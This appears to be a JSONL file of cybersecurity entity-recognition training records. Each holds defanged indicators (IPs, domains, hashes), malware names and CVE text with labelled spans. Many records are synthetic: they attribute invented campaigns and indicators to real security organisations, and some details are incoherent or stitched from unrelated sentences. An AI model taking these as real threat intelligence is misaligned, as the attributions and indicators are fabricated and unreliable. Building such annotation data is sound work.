{"text": "Phishing Campaign Report: CrowdStrike identified a large-scale phishing operation. Emails originated from updates@document-share[.]link and updates@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxps://login-data[ . ]top/admin/config which hosted a credential harvesting page on proxycache[ . ]link. A secondary link hxxps://mailgateway[ . ]io/portal/verify delivered Gootloader (SHA256: 1435898cb7c23425eb14eb401ef1d006e4729337072d75ca97845245fef22440). The malware was saved to C:\\Program Files\\Common Files\\ntds.dit and established C2 with 209[.]11[.]33[.]111.", "spans": {"Organization: CrowdStrike": [[26, 37]], "Indicator: updates@document-share.link": [[106, 135]], "Indicator: updates@urgent-notice.online": [[140, 170]], "Indicator: https://login-data.top/admin/config": [[227, 266]], "Indicator: proxycache.link": [[312, 331]], "Indicator: https://mailgateway.io/portal/verify": [[350, 390]], "Malware: Gootloader": [[401, 411]], "Indicator: 1435898cb7c23425eb14eb401ef1d006e4729337072d75ca97845245fef22440": [[421, 485]], "Indicator: 209.11.33.111": [[576, 595]]}, "info": {"id": "synth_v2_01026", "source": "defanged_augment"}}
{"text": "Once the user attempts to open the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings[ . ]xml[ . ]rels file of the DOCX document .", "spans": {"Organization: Microsoft": [[46, 55]], "Indicator: settings.xml.rels": [[190, 215]]}, "info": {"id": "cyberner_stix_train_004154", "source": "defanged_augment"}}
{"text": "Tuleap is a Libre and Open Source tool for end to end traceability of application and system developments. This is a follow up to GHSA-887w-pv2r-x8pm/CVE-2021-41276, the initial fix was incomplete. Tuleap does not sanitize properly the search filter built from the ldap_id attribute of a user during the daily synchronization. A malicious user could force accounts to be suspended or take over another account by forcing the update of the ldap_uid attribute. Note that the malicious user either need to have site administrator capability on the Tuleap instance or be an LDAP operator with the capability to create/modify account. The Tuleap instance needs to have the LDAP plugin activated and enabled for this issue to be exploitable. The following versions contain the fix: Tuleap Community Edition 13[.]2[.]99[.]83, Tuleap Enterprise Edition 13.1-6, and Tuleap Enterprise Edition 13.2-4.", "spans": {"Vulnerability: CVE-2021-41276": [[150, 164]], "Indicator: 13.2.99.83": [[801, 817]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-43782"}}
{"text": "A backdoor also known as: HW32.Packed.3E85 Backdoor.Win32.Nepoe!O Dropper.Paradrop.Win32.108 W32/Korgo.worm PE_AGOBOT.AQM Win32.Trojan.WisdomEyes.16070401.9500.9889 W32/Bobax.AO W32.Bleshare PE_AGOBOT.AQM Win.Trojan.Poebot-45 Trojan-Dropper.Win32.Paradrop.a Trojan.Win32.Paradrop.xhlx Dropper.Paradrop.180736 Troj.Dropper.W32.Paradrop.kYTK TrojWare.Win32.TrojanDropper.Paradrop.a0 Trojan.MulDrop.2267 BehavesLike[.]Win32[.]Conficker[.]cc Backdoor.Win32.PoeBot.C W32/Bobax.LVYX-1108 TrojanDropper.Paradrop TR/Drop.Paradro.a.3 Trojan[Backdoor]/Win32.Agobot TrojanDropper:Win32/Paradrop.J Trojan-Dropper.Win32.Paradrop.a W32/Polybot.dr Backdoor.PoeBot Trj/Droppofonic.A Win32/TrojanDropper.Paradrop.A Worm.PoeBot.S W32/Paradrop.B!tr.dr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Conficker.cc": [[401, 437]]}, "info": {"id": "cyner2_train_007109", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Meduza Stealer Campaign:\nNetwork Indicators:\n- 10[.]143[.]46[.]198\n- 192 [ . ] 114 [ . ] 71 [ . ] 131\n- 172 [ . ] 94 [ . ] 178 [ . ] 62\n- authnode[.]tech\n- storagemail[.]info\nURLs:\n- hxxp://storage-edge[ . ]dev/api/v2/auth\n- hxxp://updatecdn[ . ]dev/secure/token\nEmail Senders:\n- service@login-portal[.]tech\n- admin@login-portal[ . ]tech\nFile Indicators:\n- SHA256: 13bc7078d254063e5d45ba0580bc85f008076b67c6dc5556a84e35cf2917687c\n- SHA1: f56ecda5823de4a73e2bb579c2a2d0be6f3b6125\n- Drop path: C:\\Users\\admin\\Downloads\\loader.exe", "spans": {"Malware: Meduza Stealer": [[15, 29]], "Indicator: 10.143.46.198": [[62, 81]], "Indicator: 192.114.71.131": [[84, 116]], "Indicator: 172.94.178.62": [[119, 150]], "Indicator: authnode.tech": [[153, 168]], "Indicator: storagemail.info": [[171, 189]], "Indicator: hxxp://storage-edge.dev/api/v2/auth": [[198, 237]], "Indicator: hxxp://updatecdn.dev/secure/token": [[240, 277]], "Indicator: service@login-portal.tech": [[295, 322]], "Indicator: admin@login-portal.tech": [[325, 352]], "Indicator: 13bc7078d254063e5d45ba0580bc85f008076b67c6dc5556a84e35cf2917687c": [[380, 444]], "Indicator: f56ecda5823de4a73e2bb579c2a2d0be6f3b6125": [[453, 493]]}, "info": {"id": "synth_v2_01481", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 W32/Virut.AI W32[ . ]Virut[ . ]CF Win32/Virut.17408 PE_VIRUX.A-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.tt Virus.Win32.Virut.CE Trojan.MulDrop1.57199 PE_VIRUX.A-1 BehavesLike.Win32.Virut.dc W32/Virut.AI Win32/Virut.bn Trojan[Dropper]/Win32.Injector Win32.Virut.nc.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Win32/Virut.NBP IM-Worm.Win32.Zeroll W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[107, 127]]}, "info": {"id": "cyner2_train_007672", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix data-race around unix_tot_inflight.\n\nunix_tot_inflight is changed under spin_lock(unix_gc_lock), but\nunix_release_sock() reads it locklessly.\n\nLet's use READ_ONCE() for unix_tot_inflight.\n\nNote that the writer side was marked by commit 9d6d7f1cb67c (\"af_unix:\nannote lockless accesses to unix_tot_inflight & gc_in_progress\")\n\nBUG: KCSAN: data-race in unix_inflight / unix_release_sock\n\nwrite (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1:\n unix_inflight+0x130/0x180 net/unix/scm.c:64\n unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123\n unix_scm_to_skb net/unix/af_unix.c:1832 [inline]\n unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x148/0x160 net/socket.c:747\n ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493\n ___sys_sendmsg+0xc6/0x140 net/socket.c:2547\n __sys_sendmsg+0x94/0x140 net/socket.c:2576\n __do_sys_sendmsg net/socket.c:2585 [inline]\n __se_sys_sendmsg net/socket.c:2583 [inline]\n __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nread to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0:\n unix_release_sock+0x608/0x910 net/unix/af_unix.c:671\n unix_release+0x59/0x80 net/unix/af_unix.c:1058\n __sock_release+0x7d/0x170 net/socket.c:653\n sock_close+0x19/0x30 net/socket.c:1385\n __fput+0x179/0x5e0 fs/file_table.c:321\n ____fput+0x15/0x20 fs/file_table.c:349\n task_work_run+0x116/0x1a0 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:171 [inline]\n exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204\n __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline]\n syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297\n do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\n\nvalue changed: 0x00000000 -> 0x00000001\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1[ . ]16[ . ]0-0-gd239552ce722-prebuilt[ . ]qemu[ . ]org 04/01/2014", "spans": {"Indicator: rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org": [[2273, 2333]], "System: Linux kernel": [[7, 19]], "System: systemd": [[2152, 2159]], "System: QEMU": [[2228, 2232]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-54006"}}
{"text": "A backdoor also known as: W32.Chiko.Worm Trojan/W32.StartPage.377856 Trojan.Win32.StartPage!O Worm.AutoRun W32.W.Fearso.kYUv WORM_SILLY.ICA Win32.Worm.Delf.cg W32.SillyFDC Win32/Chike.A Worm.Win32.AutoRun.ihn Trojan.Win32.StartPage.yqro Trojan.Win32.StartPage.377856 Trojan.StartPage.52501 Trojan.StartPage.Win32.1 Virus.Win32.Alman Trojan/StartPage[ . ]de TR/Delf.AKP Trojan/Win32.StartPage Win32.Virut.ce.57344 Trojan.Heur.ED91C9 Worm.Win32.AutoRun.ihn Worm:Win32/Chiki.A HEUR/Fakon.mwf TScope.Trojan.Delf W32/Chike.C.worm Win32/Delf.NFT Win32.Worm.Autorun.Pavh Trojan.StartPage!orHv1sw9Olo W32/StartPage.AJH!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: StartPage.de": [[340, 356]]}, "info": {"id": "cyner2_train_006825", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan-Downloader.Dluca.by Trojan.Downloader.Dluca-29 Trojan-Downloader.Win32.Dluca.by TrojWare.Win32.TrojanDownloader.Dluca.~D3 Dialer.Adultparty Trojan-Downloader.Win32.Dluca.dj!IK TrojanDownloader[.]Dluca[.]bg TrojanDownloader:Win32/Dluca[ . ]DK Win-Trojan/Dluca.94208 Trojan-Downloader.Win32.Dluca.dj", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojanDownloader.Dluca.bg": [[215, 244]], "Indicator: Dluca.DK": [[268, 280]]}, "info": {"id": "cyner2_train_005863", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Europol identified a large-scale phishing operation. Emails originated from notification@auth-check[ . ]org and admin@credential-check[.]site, spoofing legitimate services. Victims were directed to hxxps://node-edge[.]site/login which hosted a credential harvesting page on cdn-edge[.]com. A secondary link hxxp://proxymail[ . ]link/login delivered Ryuk (SHA256: 7f93ffbeae05b3ff6a1b061cb08c17fb3b7c6aaf18f710cca8a8719cb1eb805d). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\config.dat and established C2 with 10 [ . ] 190 [ . ] 153 [ . ] 226.", "spans": {"Organization: Europol": [[26, 33]], "Indicator: notification@auth-check.org": [[102, 133]], "Indicator: admin@credential-check.site": [[138, 167]], "Indicator: https://node-edge.site/login": [[224, 254]], "Indicator: cdn-edge.com": [[300, 314]], "Indicator: http://proxymail.link/login": [[333, 364]], "Malware: Ryuk": [[375, 379]], "Indicator: 7f93ffbeae05b3ff6a1b061cb08c17fb3b7c6aaf18f710cca8a8719cb1eb805d": [[389, 453]], "Indicator: 10.190.153.226": [[550, 582]]}, "info": {"id": "synth_v2_00945", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Certutil artifacts at C:\\ProgramData\\implant.so. Memory dump analysis confirmed execution of CrackMapExec. Registry modifications pointed to persistence via C:\\Users\\Public\\Documents\\svchost.exe. Network forensics identified connections to 165[.]194[.]47[.]5 and loginauth[ . ]site. Email headers traced the initial vector to contact@urgent-notice[ . ]online. File C:\\Program Files\\Common Files\\taskhost.exe (SHA1: f2ced5a1df3a4e8769902d1282d536d987665292) was identified as the initial dropper. A staging URL hxxp://login-api[.]top/secure/token resolved to 192 [ . ] 67 [ . ] 81 [ . ] 171. Secondary artifact hash: SHA1: c55a95118f286de674c162d21b02f3df66e83873.", "spans": {"Indicator: 165.194.47.5": [[312, 330]], "Indicator: loginauth.site": [[335, 353]], "Indicator: contact@urgent-notice.online": [[398, 430]], "Indicator: f2ced5a1df3a4e8769902d1282d536d987665292": [[487, 527]], "Indicator: http://login-api.top/secure/token": [[582, 617]], "Indicator: 192.67.81.171": [[630, 661]], "Indicator: c55a95118f286de674c162d21b02f3df66e83873": [[694, 734]]}, "info": {"id": "synth_v2_01159", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Lumma Stealer Campaign:\nNetwork Indicators:\n- 54 [ . ] 181 [ . ] 56 [ . ] 236\n- 10[.]210[.]254[.]80\n- 28[.]117[.]219[.]59\n- mailstatic[.]com\n- updatesync[ . ]net\nURLs:\n- hxxps://loginlogin[.]xyz/download/update.exe\n- hxxp://proxynode[ . ]link/login\nEmail Senders:\n- billing@account-update[ . ]xyz\n- billing@urgent-notice[ . ]online\nFile Indicators:\n- MD5: 99030999623790fce84dc5fd55382d0e\n- SHA256: f63586a5751edf100a3839f82e5cb2fcb8e070e2d1a21fc0f63d1be9d1dbc0f8\n- Drop path: C:\\Users\\Public\\Documents\\payload.bin", "spans": {"Malware: Lumma Stealer": [[15, 28]], "Indicator: 54.181.56.236": [[61, 92]], "Indicator: 10.210.254.80": [[95, 114]], "Indicator: 28.117.219.59": [[117, 136]], "Indicator: mailstatic.com": [[139, 155]], "Indicator: updatesync.net": [[158, 176]], "Indicator: https://loginlogin.xyz/download/update.exe": [[185, 229]], "Indicator: http://proxynode.link/login": [[232, 263]], "Indicator: billing@account-update.xyz": [[281, 311]], "Indicator: billing@urgent-notice.online": [[314, 346]], "Indicator: 99030999623790fce84dc5fd55382d0e": [[371, 403]], "Indicator: f63586a5751edf100a3839f82e5cb2fcb8e070e2d1a21fc0f63d1be9d1dbc0f8": [[414, 478]]}, "info": {"id": "synth_v2_01390", "source": "defanged_augment"}}
{"text": "Other than that , its major functionality is to collect private device information , upload it to a remote C2 server , and handle any commands as requested by the C2 server . In May 2016 , Unit 42 began researching attacks that used spear-phishing emails with attachments , specifically malicious Excel spreadsheets sent to financial organizations within Saudi Arabia . The script will check the presence of the “ IndexOffice[ . ]exe ” artifact : if true then it will delete it and it will download a new file/script from “ hxxp://masseffect[.]space/<PC_Name>_<Hex_Drive_SN>/post.php ” . To date , the ransomware has only been used in a limited fashion .", "spans": {"Organization: Unit 42": [[189, 196]], "Organization: financial organizations": [[324, 347]], "Indicator: IndexOffice.exe": [[414, 432]], "Indicator: http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php": [[522, 581]], "Malware: ransomware": [[600, 610]]}, "info": {"id": "cyberner_stix_train_004264", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.HfsAutoB.4D03 Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9639 Trojan.Win32.TPM.eslggg BehavesLike[.]Win32[.]PWSZbot[.]cc Trojan.Heur.RP.ZyWaayyb2wki Trojan.Win32.Z.Ircbot.839168.A Win32.Trojan.Crypt.Hqux Trojan.Themida! Trojan-PWS.OnlineGames Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.cc": [[132, 166]]}, "info": {"id": "cyner2_train_006791", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed SharpHound artifacts at /var/tmp/shell.php. Memory dump analysis confirmed execution of Covenant. Registry modifications pointed to persistence via C:\\Windows\\System32\\config.dat. Network forensics identified connections to 10[.]166[.]205[.]247 and securenode[ . ]online. Email headers traced the initial vector to info@mail-service[ . ]info. File C:\\Users\\Public\\Documents\\helper.sh (SHA256: b7f0f4cf45fca295d1ade884e5f7db5157b3f2dd093337305f1a8340b7ab6f1f) was identified as the initial dropper. A staging URL hxxp://backup-cache[.]tech/download/update.exe resolved to 54[.]67[.]241[.]145. Secondary artifact hash: MD5: 199d4e83864eb06462efbd89a5951e57.", "spans": {"Indicator: 10.166.205.247": [[296, 316]], "Indicator: securenode.online": [[321, 342]], "Indicator: info@mail-service.info": [[387, 413]], "Indicator: b7f0f4cf45fca295d1ade884e5f7db5157b3f2dd093337305f1a8340b7ab6f1f": [[465, 529]], "Indicator: http://backup-cache.tech/download/update.exe": [[584, 630]], "Indicator: 54.67.241.145": [[643, 662]], "Indicator: 199d4e83864eb06462efbd89a5951e57": [[694, 726]]}, "info": {"id": "synth_v2_01200", "source": "defanged_augment"}}
{"text": "] addroider[.]com ’ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"Organization: banks": [[157, 162]], "Organization: government organizations": [[238, 262]], "Indicator: addroider.com": [[2, 17]]}, "info": {"id": "cyberner_stix_train_000870", "source": "defanged_augment"}}
{"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . During the analysis , we also noticed the “ veter1605_MAPS_10cr0[.]exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"Malware: XLoader": [[29, 36], [106, 113]], "Malware: nbtscan": [[207, 214]], "Malware: powercat": [[219, 227]], "Indicator: veter1605_MAPS_10cr0.exe": [[350, 376]]}, "info": {"id": "cyberner_stix_train_000274", "source": "defanged_augment"}}
{"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN . APT33 : 91[.]230[.]121[.]143 backupnet[.]ddns[.]net . The ads are very similar to other brand impersonation campaigns .", "spans": {"Organization: Lookout": [[17, 24]], "Organization: U.S. Government": [[165, 180]], "Organization: DHS": [[192, 195]], "Organization: FBI": [[200, 203]], "Indicator: 91.230.121.143": [[314, 334]], "Indicator: backupnet.ddns.net": [[335, 357]]}, "info": {"id": "cyberner_stix_train_000255", "source": "defanged_augment"}}
{"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the “ Loveusd[ . ]sys ” extracted driver name to the upper filter list . In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": {"Indicator: Loveusd.sys": [[317, 332]], "System: Remote PowerShell service": [[451, 476]]}, "info": {"id": "cyberner_stix_train_007584", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 181 [ . ] 4 [ . ] 26, the Trend Micro IR team identified AgentTesla running as /usr/local/bin/helper.sh. The threat actor, believed to be Kimsuky, used Mimikatz for credential harvesting and Chisel for lateral movement. Exfiltrated data was sent to gateway-auth[.]dev and updatelogin[.]link. The initial dropper (MD5: 3e7d0838083d5cab37c16c16bacd01fe) was delivered via a phishing email from it@identity-verify[ . ]cc. A second C2 node was observed at 126[.]101[.]43[.]136, with a persistence mechanism writing to /dev/shm/lsass.dmp.", "spans": {"Indicator: 172.181.4.26": [[64, 94]], "Organization: Trend Micro": [[100, 111]], "Malware: AgentTesla": [[131, 141]], "Indicator: gateway-auth.dev": [[323, 341]], "Indicator: updatelogin.link": [[346, 364]], "Indicator: 3e7d0838083d5cab37c16c16bacd01fe": [[392, 424]], "Indicator: it@identity-verify.cc": [[466, 491]], "Indicator: 126.101.43.136": [[526, 546]]}, "info": {"id": "synth_v2_00347", "source": "defanged_augment"}}
{"text": "Zscaler ThreatLabz detected a multi-stage attack chain. The initial phishing email from contact@document-share[ . ]link contained a link to hxxps://syncbackup[.]tech/download/update.exe. This redirected to hxxp://portallogin[ . ]org/login on node-cdn[.]online. A secondary email from notification@login-portal[ . ]tech pointed to hxxps://sync-gateway[ . ]live/admin/config which delivered Raccoon Stealer. The final payload callback was hxxp://logincache[.]cc/api/v2/auth resolving to 88 [ . ] 38 [ . ] 18 [ . ] 244 via edge-portal[ . ]com.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Indicator: contact@document-share.link": [[88, 119]], "Indicator: hxxps://syncbackup.tech/download/update.exe": [[140, 185]], "Indicator: hxxp://portallogin.org/login": [[206, 238]], "Indicator: node-cdn.online": [[242, 259]], "Indicator: notification@login-portal.tech": [[284, 318]], "Indicator: https://sync-gateway.live/admin/config": [[330, 372]], "Malware: Raccoon Stealer": [[389, 404]], "Indicator: http://logincache.cc/api/v2/auth": [[437, 471]], "Indicator: 88.38.18.244": [[485, 515]], "Indicator: edge-portal.com": [[520, 539]]}, "info": {"id": "synth_v2_01706", "source": "defanged_augment"}}
{"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor[.]Sogu .", "spans": {"Indicator: Backdoor.Sogu": [[91, 106]]}, "info": {"id": "cyberner_stix_train_008007", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Halk!O Backdoor.CIA BKDR_NERTE.780 Backdoor.Win32.NerTe.780 Backdoor.Win32.Nerte_780.Inst[h] Backdoor.Win32.NerTe.780 Trojan.MulDrop.1253 BKDR_NERTE.780 W32/Risk.YHOK-6554 BDS/Nerte78.Inst Win32.Hack.NerteZip.kcloud Backdoor:Win32/Nerte.7_80.dr Bck/Iroffer[ . ]BG Win32/NerTe.78.Client W32/NerTe.V780!tr.bdr BackDoor.Nerte Backdoor.Win32.NerTe.ajn", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Iroffer.BG": [[296, 310]]}, "info": {"id": "cyner2_train_004383", "source": "defanged_augment"}}
{"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . Asala[ . ]mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"Organization: government": [[268, 278]], "Organization: technology related companies": [[282, 310]], "Indicator: Asala.mp3": [[331, 344]], "Organization: Talos": [[367, 372]]}, "info": {"id": "cyberner_stix_train_000968", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Conti (SHA1: 8648cd3dacd28a83b0e1afdb62c16f0b8026ef55). Upon execution on Zyxel USG, the sample creates /usr/local/bin/winlogon.exe and injects into legitimate processes. Network analysis shows beaconing to 106[.]173[.]72[.]234 every 60 seconds and DNS queries to proxy-cloud[.]info. The second stage was fetched from hxxp://storage-api[.]online/wp-content/uploads/doc.php and written to /home/user/.config/sam.hive. The payload uses Hashcat-style techniques for defense evasion. A secondary hash (SHA256: 2526e71c692da3557d475d25f097fd45d9c24627b166b9d4cfedf1c513536d4e) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: 8648cd3dacd28a83b0e1afdb62c16f0b8026ef55": [[38, 78]], "System: Zyxel USG": [[99, 108]], "Indicator: 106.173.72.234": [[232, 252]], "Indicator: proxy-cloud.info": [[289, 307]], "Indicator: http://storage-api.online/wp-content/uploads/doc.php": [[343, 397]], "Indicator: 2526e71c692da3557d475d25f097fd45d9c24627b166b9d4cfedf1c513536d4e": [[531, 595]]}, "info": {"id": "synth_v2_00474", "source": "defanged_augment"}}
{"text": "Blog Post by Trend Micro: Tracking Diamond Sleet's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-39439 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from confirm@document-share[.]link delivering BumbleBee. Post-compromise, the attackers deploy Cobalt Strike and use BloodHound for reconnaissance. C2 infrastructure includes 219 [ . ] 204 [ . ] 66 [ . ] 168 and backupsecure[ . ]link. A staging server at hxxp://storage-secure[.]live/secure/token hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\runtime.dll (SHA1: ed4c6da0cf4152d9984c870e854a576211a58938).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2021-39439": [[128, 142]], "System: F5 BIG-IP": [[151, 160]], "Indicator: confirm@document-share.link": [[236, 265]], "Malware: BumbleBee": [[277, 286]], "Malware: Cobalt Strike": [[326, 339]], "Indicator: 219.204.66.168": [[406, 438]], "Indicator: backupsecure.link": [[443, 464]], "Indicator: hxxp://storage-secure.live/secure/token": [[486, 527]], "Indicator: ed4c6da0cf4152d9984c870e854a576211a58938": [[604, 644]]}, "info": {"id": "synth_v2_01670", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Gootloader Campaign:\nNetwork Indicators:\n- 164[.]55[.]7[.]74\n- 193[.]251[.]126[.]184\n- 108 [ . ] 222 [ . ] 153 [ . ] 66\n- clouddata[.]io\n- edgecdn[ . ]club\nURLs:\n- hxxps://node-cache[ . ]com/callback\n- hxxp://mailapi[.]io/gate.php\nEmail Senders:\n- confirm@mail-service[.]info\n- updates@credential-check[ . ]site\nFile Indicators:\n- SHA1: 72096980728e719a33d326425eb34856c89226c0\n- MD5: dcb49797c751598ca0edbdaccb3279cd\n- Drop path: C:\\ProgramData\\shell.php", "spans": {"Malware: Gootloader": [[15, 25]], "Indicator: 164.55.7.74": [[58, 75]], "Indicator: 193.251.126.184": [[78, 99]], "Indicator: 108.222.153.66": [[102, 134]], "Indicator: clouddata.io": [[137, 151]], "Indicator: edgecdn.club": [[154, 170]], "Indicator: https://node-cache.com/callback": [[179, 214]], "Indicator: hxxp://mailapi.io/gate.php": [[217, 245]], "Indicator: confirm@mail-service.info": [[263, 290]], "Indicator: updates@credential-check.site": [[293, 326]], "Indicator: 72096980728e719a33d326425eb34856c89226c0": [[352, 392]], "Indicator: dcb49797c751598ca0edbdaccb3279cd": [[400, 432]]}, "info": {"id": "synth_v2_01322", "source": "defanged_augment"}}
{"text": "snappy-java is a fast compressor/decompressor for Java. Due to unchecked multiplications, an integer overflow may occur in versions prior to 1 [ . ] 1 [ . ] 10 [ . ] 1, causing an unrecoverable fatal error.\n\nThe function `compress(char[] input)` in the file `Snappy.java` receives an array of characters and compresses it. It does so by multiplying the length by 2 and passing it to the rawCompress` function.\n\nSince the length is not tested, the multiplication by two can cause an integer overflow and become negative. The rawCompress function then uses the received length and passes it to the natively compiled maxCompressedLength function, using the returned value to allocate a byte array.\n\nSince the maxCompressedLength function treats the length as an unsigned integer, it doesn’t care that it is negative, and it returns a valid value, which is casted to a signed integer by the Java engine. If the result is negative, a `java.lang.NegativeArraySizeException` exception will be raised while trying to allocate the array `buf`. On the other side, if the result is positive, the `buf` array will successfully be allocated, but its size might be too small to use for the compression, causing a fatal Access Violation error.\n\nThe same issue exists also when using the `compress` functions that receive double, float, int, long and short, each using a different multiplier that may cause the same issue. The issue most likely won’t occur when using a byte array, since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.\n\nVersion 1 [ . ] 1 [ . ] 10 [ . ] 1 contains a patch for this issue.", "spans": {"Indicator: 1.1.10.1": [[141, 167], [1586, 1612]], "System: Java": [[50, 54], [887, 891]], "Vulnerability: integer overflow": [[93, 109], [482, 498]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-34454"}}
{"text": "Krybit is a ransomware group that operates as a ransomware-as-a-service provider, offering affiliates 80% of ransom proceeds in exchange for technical support and a malware suite. The group has claimed attacks on various organizations across multiple countries, including asesoriauriel[ . ]com in Spain and fraper[ . ]com in Spain, without disclosing the volume of data exfiltrated. Krybit is currently engaged in a turf war with another group, 0APT, and has been accused of fabricating victim claims. Their leak site has been used to publish compromised data and to issue threats to rivals and victims alike.", "spans": {"Indicator: asesoriauriel.com": [[272, 293]], "Indicator: fraper.com": [[307, 321]]}, "info": {"source": "defanged_augment", "name": "Krybit"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: fix hugetlb vs. core-mm PT locking\n\nWe recently made GUP's common page table walking code to also walk hugetlb\nVMAs without most hugetlb special-casing, preparing for the future of\nhaving less hugetlb-specific page table walking code in the codebase. \nTurns out that we missed one page table locking detail: page table locking\nfor hugetlb folios that are not mapped using a single PMD/PUD.\n\nAssume we have hugetlb folio that spans multiple PTEs (e.g., 64 KiB\nhugetlb folios on arm64 with 4 KiB base page size).  GUP, as it walks the\npage tables, will perform a pte_offset_map_lock() to grab the PTE table\nlock.\n\nHowever, hugetlb that concurrently modifies these page tables would\nactually grab the mm->page_table_lock: with USE_SPLIT_PTE_PTLOCKS, the\nlocks would differ.  Something similar can happen right now with hugetlb\nfolios that span multiple PMDs when USE_SPLIT_PMD_PTLOCKS.\n\nThis issue can be reproduced [1], for example triggering:\n\n[ 3105.936100] ------------[ cut here ]------------\n[ 3105.939323] WARNING: CPU: 31 PID: 2732 at mm/gup.c:142 try_grab_folio+0x11c/0x188\n[ 3105.944634] Modules linked in: [...]\n[ 3105.974841] CPU: 31 PID: 2732 Comm: reproducer Not tainted 6.10.0-64.eln141.aarch64 #1\n[ 3105.980406] Hardware name: QEMU KVM Virtual Machine, BIOS edk2-20240524-4.fc40 05/24/2024\n[ 3105.986185] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 3105.991108] pc : try_grab_folio+0x11c/0x188\n[ 3105.994013] lr : follow_page_pte+0xd8/0x430\n[ 3105.996986] sp : ffff80008eafb8f0\n[ 3105.999346] x29: ffff80008eafb900 x28: ffffffe8d481f380 x27: 00f80001207cff43\n[ 3106.004414] x26: 0000000000000001 x25: 0000000000000000 x24: ffff80008eafba48\n[ 3106.009520] x23: 